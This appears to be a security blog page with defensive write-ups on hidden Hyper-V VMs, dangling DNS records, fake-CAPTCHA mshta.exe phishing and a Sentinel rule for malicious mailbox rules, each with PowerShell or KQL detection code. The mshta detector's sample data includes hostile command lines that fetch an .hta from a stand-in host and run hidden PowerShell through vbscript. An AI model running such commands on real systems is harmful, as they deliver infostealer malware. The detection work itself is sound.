
Blog

The Virtualized Threat: Malicious actors exploiting native Hyper-V virtualization features to conduct covert operations

Threat actor groups such as Akira Ransomware, Curly COMrades, and UNC3886 have been observed abusing native Windows Hyper-V virtualization features to create hidden virtual machines (VMs), establishing covert, long-term operations in which the adversary performs internal reconnaissance, deploys malware implants and proxies network activity, all while evading host-centric monitoring tools that have no visibility into what runs inside the guest.

Organizations that are not auditing virtualized endpoints, and that lack tailored endpoint detections alongside network observability, may be at risk.

This blog post will examine the methods used by these malicious actors to abuse native virtualization features and detection strategies organizations can implement against these attacks.
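The audit the teaser calls for can start with a simple host triage. The following PowerShell is an added example, not code from the SRA post: it checks whether the Hyper-V platform, its management service, VM worker processes, registered VMs and virtual switches are present on a host, and pulls the most recent VMMS admin events. The hypervisor allow-list is an assumption you would populate from your own asset inventory.

```powershell
# Added example, not code from the SRA post. Quick triage of a Windows host for
# Hyper-V activity that should not be there. Run in an elevated session.
# The allow-list of legitimate hypervisors is an assumption; fill it from your CMDB.

$knownHypervisors = @('HV-PROD-01', 'HV-PROD-02')   # assumption: hosts where VMs are expected
$findings = [System.Collections.Generic.List[string]]::new()
$isKnownHost = $env:COMPUTERNAME -in $knownHypervisors

# 1. Is the Hyper-V platform enabled at all on this host?
$feature = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -ErrorAction SilentlyContinue
if ($feature -and $feature.State -eq 'Enabled' -and -not $isKnownHost) {
    $findings.Add('Hyper-V feature enabled on a host that is not an approved hypervisor')
}

# 2. Virtual Machine Management Service (vmms) state
$vmms = Get-Service -Name vmms -ErrorAction SilentlyContinue
if ($vmms -and $vmms.Status -eq 'Running') {
    $findings.Add('vmms (Hyper-V Virtual Machine Management) service is running')
}

# 3. Each running guest has its own vmwp.exe worker process
Get-Process -Name vmwp -ErrorAction SilentlyContinue | ForEach-Object {
    $findings.Add("VM worker process vmwp.exe running, PID $($_.Id), started $($_.StartTime)")
}

# 4. Registered VMs and where their configuration lives (needs the Hyper-V module)
if (Get-Command Get-VM -ErrorAction SilentlyContinue) {
    Get-VM -ErrorAction SilentlyContinue | ForEach-Object {
        $findings.Add("Registered VM '$($_.Name)' state=$($_.State) path=$($_.Path)")
    }
    # 5. A virtual switch is what gives a guest a route onto your network
    Get-VMSwitch -ErrorAction SilentlyContinue | ForEach-Object {
        $findings.Add("Virtual switch '$($_.Name)' type=$($_.SwitchType)")
    }
}

# 6. Recent VMMS admin events record VM lifecycle activity even if the VM has
#    since been deleted; keep the first line of each message for readability
Get-WinEvent -LogName 'Microsoft-Windows-Hyper-V-VMMS-Admin' -MaxEvents 20 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $firstLine = ($_.Message -split "`n" | Select-Object -First 1)
        $findings.Add("VMMS event $($_.Id) at $($_.TimeCreated): $firstLine")
    }

if ($findings.Count -eq 0) {
    Write-Output "No Hyper-V activity found on $($env:COMPUTERNAME)"
} else {
    Write-Output "Hyper-V findings on $($env:COMPUTERNAME):"
    $findings | ForEach-Object { Write-Output " - $_" }
}
```

Pushed out through EDR or RMM scripting, the same checks become a fleet-wide alert condition: vmms running or vmwp.exe present on any host that is not an approved hypervisor is worth a ticket. Because a guest reaches the network through the virtual switch on the host's NIC, the guest's traffic is visible to network sensors even when the host agent sees nothing, which is why the teaser pairs endpoint detections with network observability.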

...Read the full post on SRA's Blog...

https://sra.io/blog/the-virtualized-threat-malicious-actors-exploiting-native-hyper-v-virtualization-features-to-conduct-covert-operations/

Clean Up Your DNS Records Before We Get Ants (or Hacked)

Just as you would clean up your dishes after a meal and put food away to prevent getting ants in the kitchen, organizations should be cleaning up their DNS records.


This, accompanied by a proactive auditing process that keeps an organization's DNS records current, mitigates the risk of (sub)domain takeovers caused by dangling DNS records: records that still point at a hostname, IP address or cloud resource the organization no longer controls.

When DNS records are left unmanaged, malicious actors can claim the abandoned target and use the organization's reputation and trusted domains for nefarious purposes.
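The audit described above can be scripted. The PowerShell below is an added example, not code from the SRA post: it walks a set of records, resolves each CNAME target, and reports the ones that no longer resolve as dangling candidates. The zone data and the stub resolver are constructed so the example runs offline; dropping the -Resolver argument uses Resolve-DnsName against live DNS.

```powershell
# Added example, not code from the SRA post. Flags CNAME records whose target
# no longer resolves, the classic "dangling" precursor to a subdomain takeover.
# The zone below is constructed sample data (not real records).

function Test-DanglingCname {
    [CmdletBinding()]
    param(
        # Objects with Name, Type and Target properties, e.g. from a zone export
        [Parameter(Mandatory)] [object[]] $Records,
        # Resolver: takes a hostname, returns on success, throws on lookup failure.
        # Default uses live DNS (-DnsOnly skips the hosts file and local cache).
        [scriptblock] $Resolver = { param($Target) Resolve-DnsName -Name $Target -Type A -DnsOnly -ErrorAction Stop }
    )
    foreach ($r in $Records | Where-Object Type -eq 'CNAME') {
        $status = 'resolves'
        $detail = ''
        try {
            $null = & $Resolver $r.Target
        } catch {
            # NXDOMAIN (or any other failure) on the target means the record points
            # at something nobody is serving any more: a takeover candidate
            $status = 'DANGLING'
            $detail = $_.Exception.Message
        }
        [pscustomobject]@{
            Name   = $r.Name
            Target = $r.Target
            Status = $status
            Detail = $detail
        }
    }
}

# Constructed sample zone export
$zone = @(
    [pscustomobject]@{ Name = 'www.example.com';     Type = 'CNAME'; Target = 'live-site.hosting.example.net' }
    [pscustomobject]@{ Name = 'old-app.example.com'; Type = 'CNAME'; Target = 'retired-app.hosting.example.net' }
    [pscustomobject]@{ Name = 'mail.example.com';    Type = 'A';     Target = '192.0.2.10' }
)

# Stub resolver so the example runs offline: only one target still "exists"
$stillServed = @('live-site.hosting.example.net')
$stubResolver = {
    param($Target)
    if ($Target -notin $stillServed) { throw "DNS name does not exist: $Target" }
    $Target
}.GetNewClosure()

Test-DanglingCname -Records $zone -Resolver $stubResolver | Format-Table -AutoSize

# Against real DNS, omit -Resolver:
# Test-DanglingCname -Records $zone
```

With the stub, the retired-app target is the one reported DANGLING. A record that fails to resolve is a candidate, not a confirmed takeover; the follow-up is to check whether the target's hosting provider lets anyone register that name again, and to delete the record either way.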

...Read the full post on SRA's Blog...

https://sra.io/blog/clean-up-your-dns-records-before-we-get-ants-or-hacked/

The recent resurgence of malicious MSHTA activity

We are noticing a resurgence in phishing campaigns that use fake CAPTCHA verification pages to distribute malware through abused mshta.exe commands. These attacks bypass security controls and end with adversaries stealing sensitive data through infostealers such as Lumma and Vidar.
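The pattern these lures rely on is mshta.exe being handed a remote URL or an inline script, which is straightforward to check for. The PowerShell below is an added example, not code from the SRA post: it scores process command lines for those patterns, runs over constructed sample lines, and then applies the same check to the mshta.exe processes currently running on the host. The sample command lines are made up for the demonstration, not captured from an incident.

```powershell
# Added example, not code from the SRA post. Scores mshta.exe command lines for
# the patterns seen in fake-CAPTCHA lures (remote URL or inline script passed
# straight to mshta), then checks live processes. Sample lines are constructed.

function Test-SuspiciousMshta {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [string] $CommandLine)
    process {
        # Only look at mshta invocations (bare name or full path, with or without .exe)
        if ($CommandLine -notmatch '(?i)(^|[\\/\s"])mshta(\.exe)?("|\s|$)') { return }

        $reasons = @()
        if ($CommandLine -match '(?i)\bhttps?://')              { $reasons += 'remote URL passed to mshta' }
        if ($CommandLine -match '(?i)\b(javascript|vbscript):') { $reasons += 'inline script via protocol handler' }
        if ($CommandLine -match '\\\\[^\\\s]+\\')                { $reasons += 'UNC path argument' }
        if ($CommandLine -match '(?i)\.hta\b' -and $CommandLine -notmatch '(?i)[A-Z]:\\Program Files') {
            $reasons += '.hta loaded from outside Program Files'
        }

        [pscustomobject]@{
            Suspicious  = ($reasons.Count -gt 0)
            Reasons     = ($reasons -join '; ')
            CommandLine = $CommandLine
        }
    }
}

# Constructed sample command lines (what a 4688 or Sysmon CommandLine field would hold)
$samples = @(
    'mshta https://captcha-check.example.invalid/verify.hta',
    '"C:\Windows\System32\mshta.exe" https://cdn.example.invalid/x',
    'mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -w hidden"",0:close")',
    'mshta.exe "C:\Program Files\Vendor\Tool\ui.hta"',
    'C:\Windows\explorer.exe'
)
$samples | Test-SuspiciousMshta | Format-Table -AutoSize

# Live check: any mshta.exe running on this host right now
Get-CimInstance Win32_Process -Filter "Name = 'mshta.exe'" |
    Where-Object CommandLine |
    ForEach-Object CommandLine |
    Test-SuspiciousMshta
```

The first three samples are flagged and the Program Files one is not, which is the tuning point: legitimate HTA applications exist, so alert on the argument shape rather than on mshta.exe itself. Because the fake-CAPTCHA flow has the victim paste the command into the Run dialog, mshta.exe launched with explorer.exe as its parent is a useful second signal in process-creation telemetry.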

Sentinel basics

Thought I may as well begin to share some Microsoft Sentinel basics I have learnt over the last few months, amongst other studies that I am currently completing.

This article is about analytics rules and creating a basic rule to alert on the creation of malicious mailbox rules within an environment. Attackers use compromised accounts to create mailbox rules, a simple step that gives them quiet, persistent access to the mailbox, which they can use for a wide variety of malicious purposes.
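The kind of query such a rule is built on, as an added example that is not from the original article: the KQL below hunts OfficeActivity for inbox rules with the hallmarks of attacker persistence (deleting or hiding mail, or forwarding it out, plus the one-character rule names attackers favour), and the surrounding PowerShell runs it against a workspace so it can be tuned before being pasted into a Scheduled analytics rule. It assumes the Az.Accounts and Az.OperationalInsights modules, a prior Connect-AzAccount, the Microsoft 365 data connector feeding OfficeActivity, and a placeholder workspace ID.

```powershell
# Added example, not code from the original article. Hunts OfficeActivity for
# inbox rules that delete, hide or forward mail. Assumes Az.Accounts and
# Az.OperationalInsights are installed and Connect-AzAccount has been run.

$workspaceId = '00000000-0000-0000-0000-000000000000'   # assumption: your Log Analytics workspace ID

$query = @'
OfficeActivity
| where OfficeWorkload =~ "Exchange"
| where Operation in~ ("New-InboxRule", "Set-InboxRule")
// Parameters is a JSON array of {Name, Value}; flatten it into one bag per event
| extend P = parse_json(Parameters)
| mv-apply P on (
    summarize RuleParams = make_bag(bag_pack(tostring(P.Name), tostring(P.Value)))
  )
| extend RuleName              = tostring(RuleParams["Name"]),
         DeleteMessage         = tostring(RuleParams["DeleteMessage"]),
         MarkAsRead            = tostring(RuleParams["MarkAsRead"]),
         MoveToFolder          = tostring(RuleParams["MoveToFolder"]),
         ForwardTo             = tostring(RuleParams["ForwardTo"]),
         ForwardAsAttachmentTo = tostring(RuleParams["ForwardAsAttachmentTo"]),
         RedirectTo            = tostring(RuleParams["RedirectTo"])
// Actions attackers use to stop the victim noticing stolen or injected mail
| where DeleteMessage =~ "True"
     or MarkAsRead =~ "True"
     or isnotempty(ForwardTo) or isnotempty(ForwardAsAttachmentTo) or isnotempty(RedirectTo)
     or MoveToFolder has_any ("RSS", "Conversation History", "Archive", "Junk", "Deleted Items")
     or strlen(RuleName) <= 1
| project TimeGenerated, UserId, ClientIP, Operation, RuleName, DeleteMessage, MarkAsRead,
          MoveToFolder, ForwardTo, ForwardAsAttachmentTo, RedirectTo
'@

# Run the hunt over the last day; once tuned, paste $query into a Scheduled analytics rule
$result = Invoke-AzOperationalInsightsQuery -WorkspaceId $workspaceId -Query $query -Timespan (New-TimeSpan -Days 1)
$result.Results | Format-Table -AutoSize
```

Expect legitimate hits from users who really do file newsletters into RSS Feeds; the usual tuning is to keep the forwarding and delete conditions as they are and require an external address or an unusual ClientIP for the folder-move conditions.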